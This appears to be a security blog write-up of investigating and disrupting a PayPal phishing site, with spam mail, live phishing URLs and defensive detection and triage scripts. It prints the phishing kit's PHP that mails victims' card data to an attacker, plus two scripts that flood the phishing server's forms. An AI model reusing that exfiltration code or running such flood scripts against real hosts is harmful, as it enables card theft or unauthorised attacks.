Pwning a paypal phishing site

Recently, a colleague sent us a link to a PayPal phishing site. After we had a look at the website, we started a “counter-attack”.

What is phishing

So what does ‘phishing’ mean? It is a kind of social-engineering attack in which the victim is tricked into divulging personal information (often login credentials, credit card data, and so on). Phishing sites usually imitate the websites of big companies like PayPal, Google or eBay, and the criminals register similar-looking domains so that the URL resembles the original one. A common way to get victims onto those malicious pages is to send huge amounts of spam mail. However, phishing can also be done via XSS attacks (e.g. by injecting a new UI element that asks for credentials, or by changing the “action” attribute of an existing form).

The spam mail

The attackers chose the common method to spread their phishing page. We received the following (German) spam mail:

Dear PayPal© customer,
As part of our security measures we regularly review activity in the
PayPal system. During an investigation we have discovered an
inadequacy in your invoices.

Please log in to your account as soon as possible to avoid further limitations. Log in [http://victorlipkin.com//wp-includes/https.www.paypal.de/de/webapps/]
https://www.paypal.de/de/cgi-bin/webscr?cmd=_login-submit [http://victorlipkin.com//wp-includes/https.www.paypal.de/de/webapps/index.php?vclhwozmgr=d3d3LnBheXBhbC5kZS5zZWN1cml0eS5jb20uZGUucXdyanFyb2oxMmlvNGoxbW9ya2pxbXdya24xbTJybjFvaXJuMXJuMXFya3F3cnF3ciAxbWs0MnFycXdy]

Thank you for your cooperation. Please understand that these
security measures are undertaken to protect you and your account.
We apologise for the inconvenience we are causing you.

The email states that PayPal checks account activity as part of its security measures and that it has noticed unusual activity in your account. You are told to log in to PayPal via the given link as soon as possible.

Despite the email’s poor spelling and the missing complimentary close, it sounds “convincing”, and you are tempted to log in to your account right now. Inexperienced internet users (like your grandma) might well enter their login credentials on the phishing page…

The website

Let’s continue with the phishing page. The attackers put the following two URLs in their phishing email:

http://victorlipkin.com//wp-includes/https.www.paypal.de/de/webapps/
http://victorlipkin.com//wp-includes/https.www.paypal.de/de/webapps/index.php?vclhwozmgr=d3d3LnBheXBhbC5kZS5zZWN1cml0eS5jb20uZGUucXdyanFyb2oxMmlvNGoxbW9ya2pxbXdya24xbTJybjFvaXJuMXJuMXFya3F3cnF3ciAxbWs0MnFycXdy

The first question that should come to mind is: why would PayPal use a third-party domain? OK - maybe that’s a new special marketing feature ;)

If you take a quick look at the middle/end of the URL, you’re tempted to read “https://www.paypal.de”. In fact, it reads “https.www.paypal.de” (notice the difference between ‘:’ and ‘.’).

At this point we can assume that the attackers either set up or compromised the domain/website “victorlipkin.com”. We informed the webmaster of this website about the probable compromise, but we haven’t received any response yet.

Using ‘curl’ or ‘wget’ we can safely view/download the website’s source code. Modern browsers like Google Chrome should display a warning that this page may contain malicious content and stop the redirection, but it takes Google some hours/days to add a site to its database.

Otherwise we’ll be redirected to a new location:

http://207.218.205.218/~degrapa/utilerias/gateway/online/index.php?cmd=ID=d3d3LnBheXBhbC5kZS5zZWN1cml0eS5jb20uZGUucXdyanFyb2oxMmlvNGoxbW9ya2pxbXdya24xbTJybjFvaXJuMXJuMXFya3F3cnF3ciAxbWs0MnFycXdy

This page was a good-looking clone of the PayPal login/register page. It came with some slight modifications, such as having to enter your credit card details during the registration process; usually PayPal asks for that data after registration is completed.
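One way to automate the two checks described above (a brand name sitting somewhere other than the real host, and the bait hostname hidden in the base64 query parameter) is shown below. This is an added example, not code from the original post: the three URLs are the ones quoted in the post, while the list of protected brand domains is an assumption.

```python
#!/usr/bin/env python3
"""Flag URLs that carry a trusted brand name somewhere other than the real host.

Added example, not code from the original post. The three URLs below are the
ones quoted in the post; the list of protected brand domains is an assumption.
"""
import base64
from urllib.parse import parse_qs, urlsplit

# Assumption: the brand domains we want to protect against lookalikes.
BRAND_DOMAINS = ("paypal.de", "paypal.com")

# URLs quoted in the post (the third one is the page the first redirects to).
QUOTED_URLS = [
    "http://victorlipkin.com//wp-includes/https.www.paypal.de/de/webapps/",
    "http://victorlipkin.com//wp-includes/https.www.paypal.de/de/webapps/index.php"
    "?vclhwozmgr=d3d3LnBheXBhbC5kZS5zZWN1cml0eS5jb20uZGUucXdyanFyb2oxMmlvNGoxbW9ya2pxbXdya24xbTJybjFvaXJuMXJuMXFya3F3cnF3ciAxbWs0MnFycXdy",
    "http://207.218.205.218/~degrapa/utilerias/gateway/online/index.php"
    "?cmd=ID=d3d3LnBheXBhbC5kZS5zZWN1cml0eS5jb20uZGUucXdyanFyb2oxMmlvNGoxbW9ya2pxbXdya24xbTJybjFvaXJuMXJuMXFya3F3cnF3ciAxbWs0MnFycXdy",
]


def is_brand_host(host, brand):
    """True only when host is the brand domain itself or one of its subdomains."""
    return host == brand or host.endswith("." + brand)


def decode_tracking_params(url):
    """Base64-decode every query value that decodes to printable ASCII.

    Phishing kits often carry the bait hostname in such a parameter; the kit in
    the post does. A value shaped like "ID=<b64>" is handled by decoding the
    part after the last non-padding '='.
    """
    decoded = {}
    for key, values in parse_qs(urlsplit(url).query).items():
        for value in values:
            candidate = value.rsplit("=", 1)[-1] if "=" in value.rstrip("=") else value
            try:
                text = base64.b64decode(candidate, validate=True).decode("ascii")
            except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
                continue
            if text.isprintable():
                decoded[key] = text
    return decoded


def lookalike_brand(url, brands=BRAND_DOMAINS):
    """Return the brand a URL imitates, or None.

    None means either the host really belongs to one of the brands, or no
    brand name appears in the host, path, query or decoded query parameters.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if any(is_brand_host(host, b) for b in brands):
        return None
    haystack = " ".join([host, parts.path, parts.query,
                         *decode_tracking_params(url).values()]).lower()
    for brand in brands:
        if brand in haystack:
            return brand
    return None


if __name__ == "__main__":
    for url in QUOTED_URLS + ["https://www.paypal.de/de/cgi-bin/webscr?cmd=_login-submit"]:
        print(lookalike_brand(url) or "genuine/unknown", "<-", url[:70])
```

The host check deliberately uses only `urlsplit(...).hostname`, so `https.www.paypal.de` in the path and a decoded `www.paypal.de.security.com.de...` in the query both count as imitation, while a real `www.paypal.de` host does not. On the IP-address URL from the post the brand name is invisible in the raw string and only shows up after decoding the `cmd` parameter, which is why the decoder feeds into the haystack.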

Again you should ask yourself:

  • Why does paypal serve a website without a domain?

  • Why does it ask for credit card data during the registration process?

  • Why is there no “green” SSL sign?

Nevertheless there are people who still think that this is a valid PayPal website :(

The attacker’s mistake

In our opinion, this is the funniest part of the story. The attacker forgot to disable directory listing on his server and thus allowed us to have a closer look:

Index of /~degrapa/utilerias
Parent Directory
gateway/
phpmailer/
security.tgz
Apache Server at 207.218.205.218 Port 80
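A defender auditing their own hosts can recognise and parse such a listing automatically and flag archives or text files that should never sit in a listable directory. This is an added example, not code from the original post: the sample HTML is constructed to mirror the listing above in the shape Apache’s mod_autoindex emits, and the list of sensitive suffixes is an assumption.

```python
#!/usr/bin/env python3
"""Detect an exposed Apache directory listing and flag downloadable archives in it.

Added example, not code from the original post. SAMPLE_LISTING is constructed
to mirror the listing quoted in the post, in the shape mod_autoindex emits;
the set of sensitive suffixes is an assumption.
"""
from html.parser import HTMLParser

# Assumption: file types that should never be reachable through a listable directory.
SENSITIVE_SUFFIXES = (".tgz", ".tar.gz", ".zip", ".sql", ".txt", ".log", ".bak")

# Constructed sample, modelled on the listing quoted in the post.
SAMPLE_LISTING = """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head><title>Index of /~degrapa/utilerias</title></head>
<body><h1>Index of /~degrapa/utilerias</h1>
<ul><li><a href="/~degrapa/"> Parent Directory</a></li>
<li><a href="gateway/"> gateway/</a></li>
<li><a href="phpmailer/"> phpmailer/</a></li>
<li><a href="security.tgz"> security.tgz</a></li>
</ul>
<address>Apache Server at 207.218.205.218 Port 80</address>
</body></html>
"""


class _ListingParser(HTMLParser):
    """Collect the <title> text and every <a href> on the page."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.hrefs = []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def parse_listing(html):
    """Return {"path", "entries", "sensitive"} for an autoindex page, else None.

    Only relative links count as entries: the absolute parent-directory link
    and the "?C=N;O=D" column-sort links that FancyIndexing adds are dropped.
    """
    parser = _ListingParser()
    parser.feed(html)
    title = parser.title.strip()
    if not title.startswith("Index of "):
        return None
    entries = [h for h in parser.hrefs if not h.startswith(("/", "?", "#"))]
    sensitive = [e for e in entries if e.lower().endswith(SENSITIVE_SUFFIXES)]
    return {"path": title[len("Index of "):], "entries": entries, "sensitive": sensitive}


if __name__ == "__main__":
    print(parse_listing(SAMPLE_LISTING))
```

Run against the sample it reports `security.tgz` as a downloadable archive in `/~degrapa/utilerias`. The corresponding fix on the server side is `Options -Indexes` in the Apache configuration (or per directory in `.htaccess`), together with keeping backups and log files outside the document root altogether.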

The source code

We decided to download the ‘security.tgz’ file and extract it. Three PHP files were responsible for the phishing attack; the rest was used to re-create the PayPal design. This web application was designed to steal the victims’ login credentials and/or credit card data, store them in two separate text files, and also send them to a specific Gmail address.

The most interesting part looked like this:

[...]
$from = "From: admin@localhost.com";
// subject line: the victim's name and card number, taken straight from the POSTed form
$subj = "".$_POST['first_name']." ".$_POST['lname']." - ".$_POST['ccnumber']."";
// mail the captured data to the attacker's Gmail address (redacted in the post)
mail("xxxxxxxxxxx@gmail.com", $subj, $message);
// ...and append it to a text file next to the script (name redacted in the post),
// which is what later turned out to be publicly accessible
$pula = fopen ("xxxxxx.txt" , "a");
fwrite ($pula , $message);
fclose ($pula);
// send the victim on to a fake "success" page
header("Location: success.html");

Boom: The logfile was publicly accessible, so we downloaded a copy of it. After having a quick look into the two logfiles we were shocked:

  • ~ 35 people entered their credit card details
  • ~ 337 people entered their login credentials

We had thought that phishing would not be that profitable anymore, but this proved us wrong.

The counterattack

The attacker did not use a captcha or any rate limiting. That’s why we wrote two short Python scripts (one for the login form, one for the registration form) which submit fake details:

#!/usr/bin/python2.7
 
import random
import urllib2
import urllib
 
SPAMURL="http://207.218.205.218/~degrapa/utilerias/gateway/online/username.php"
 
def randstr(leng):
    res = ""
    for i in xrange(0,leng):
        res = res + str(chr(random.randint(65,125)))
    return res
def sendSpamReq(url):
    data = urllib.urlencode({'login_email':randstr(8)+"@"+randstr(3)+".de",
                             'login_password':randstr(12)
   })
    urllib2.urlopen(urllib2.Request(url,data))
count = 0
while True: 
    count=count+1
    try:
        sendSpamReq(SPAMURL)
        print "["+str(count)+"] Success"
    except:
        print "["+str(count)+"] Failed"

#!/usr/bin/python2.7
 
import random
import urllib2
import urllib
 
SPAMURL="http://207.218.205.218/~degrapa/utilerias/gateway/online/post.php"
 
def randstr(leng):
    res = ""
    for i in xrange(0,leng):
        res = res + str(chr(random.randint(65,125)))
    return res
def randdobdd():
    return random.randint(0,31)
def randdobmm():
    return random.randint(0,12)
def randdobyy():
    return random.randint(1950,2000)
def randzip():
    return random.randint(10000,99999)
    
def sendSpamReq(url):
    data = urllib.urlencode({'first_name':randstr(10),
                            'last_name':randstr(15),
                            'dob_dd':randdobdd(),
                            'dob_mm':randdobmm(),
                            'dob_yyyy_':randdobyy(),
                            'address1':randstr(5),
                            'address2':randstr(7),
                            'city': randstr(20),
                            'zip': randzip(),
                            'cardIssuer':randstr(10),
                            'codel':randstr(5),
                            'kto_number':randstr(20),
                            'cardnumber':randstr(50),
                            'expdate_month':randdobmm(),
                            'expdate_year':randdobyy(),
                            'cvv2_number':randstr(5)
   })
    urllib2.urlopen(urllib2.Request(url,data))
count = 0
while True: 
    count=count+1
    try:
        sendSpamReq(SPAMURL)
        print "["+str(count)+"] Success"
    except:
        print "["+str(count)+"] Failed"

Those scripts should flood the logfile and the attacker’s inbox. After some hours the attacker decided to take his phishing page off the internet. Maybe he had noticed that something went “wrong” ;)

Emailing all victims

We felt it was our responsibility to inform the victims. In the end it took us some hours to notify all 300 victims (we removed duplicate entries first).

During the process we saw some addresses like paypal-payment@company.com. Some companies need to review their security policies :(
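The triage steps described above (counting how many people disclosed credentials versus card data, removing duplicate entries before notifying, and spotting shared company mailboxes) can be done with a small script that also masks card numbers so that nobody handling the notification list sees full PANs. This is an added example, not code from the original post; the post does not show the drop-file format, so the `key=value|key=value` lines below are constructed sample data with fake credentials and public test card numbers.

```python
#!/usr/bin/env python3
"""Triage a phishing kit's drop files: unique victims, what each disclosed,
masked card numbers, and shared company mailboxes that need a special note.

Added example, not code from the original post. The post does not show the
drop-file format, so the "key=value|key=value" lines below are constructed
sample data with fake credentials and public test card numbers.
"""
import re

# Constructed sample of the login drop file (note the duplicate, differently cased entry).
LOGIN_LOG = """\
login_email=alice@example.com|login_password=hunter2
login_email=Alice@Example.com|login_password=hunter2
login_email=bob@example.org|login_password=letmein
login_email=paypal-payment@company.example|login_password=Summer2013
"""

# Constructed sample of the credit-card drop file; the PANs are public test numbers.
CARD_LOG = """\
first_name=Alice|lname=Doe|ccnumber=4111111111111111|cvv2_number=123|login_email=alice@example.com
first_name=Carol|lname=Poe|ccnumber=5500000000000004|cvv2_number=456|login_email=carol@example.net
"""

PAN_RE = re.compile(r"\b\d{13,19}\b")  # 13-19 digit runs are card-number shaped


def parse_entries(text):
    """Yield one dict per non-empty line of a 'k=v|k=v' drop file."""
    for line in text.splitlines():
        if line.strip():
            yield dict(part.split("=", 1) for part in line.split("|") if "=" in part)


def mask_pans(line):
    """Keep only the last four digits of anything card-number shaped."""
    return PAN_RE.sub(lambda m: "*" * (len(m.group()) - 4) + m.group()[-4:], line)


def victims(login_text, card_text):
    """Map lowercased e-mail -> set of what that person disclosed."""
    seen = {}
    for label, text in (("credentials", login_text), ("card", card_text)):
        for entry in parse_entries(text):
            email = entry.get("login_email", "").strip().lower()
            if email:
                seen.setdefault(email, set()).add(label)
    return seen


def shared_mailboxes(emails, hints=("payment", "paypal", "billing", "accounting")):
    """Addresses that look like shared company mailboxes, as the post observed.
    Their password is probably known to several people, so the notification
    should ask for a reset rather than assume a single owner."""
    return sorted(e for e in emails if any(h in e.split("@", 1)[0] for h in hints))


def notification_plan(login_text, card_text):
    """Everything needed to write the notification e-mails, with PANs masked."""
    found = victims(login_text, card_text)
    return {
        "unique_victims": len(found),
        "disclosed_card": sorted(e for e, what in found.items() if "card" in what),
        "shared_mailboxes": shared_mailboxes(found),
        "redacted_card_lines": [mask_pans(l) for l in card_text.splitlines() if l.strip()],
    }


if __name__ == "__main__":
    for key, value in notification_plan(LOGIN_LOG, CARD_LOG).items():
        print(key, "->", value)
```

Keying on the lowercased address is what collapses the two `alice` entries into one victim, and the masked lines are the only form of the card data that should leave the analyst’s machine; the unmasked drop file itself is evidence to be handed to the payment provider and law enforcement, not something to keep around.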

Update: 11.03.2013

About 10% of the victims replied to our information email and thanked us for the hint. Some of them said that they had noticed the phishing attack after one failed login attempt and had changed their password immediately. Others were quite surprised by the information.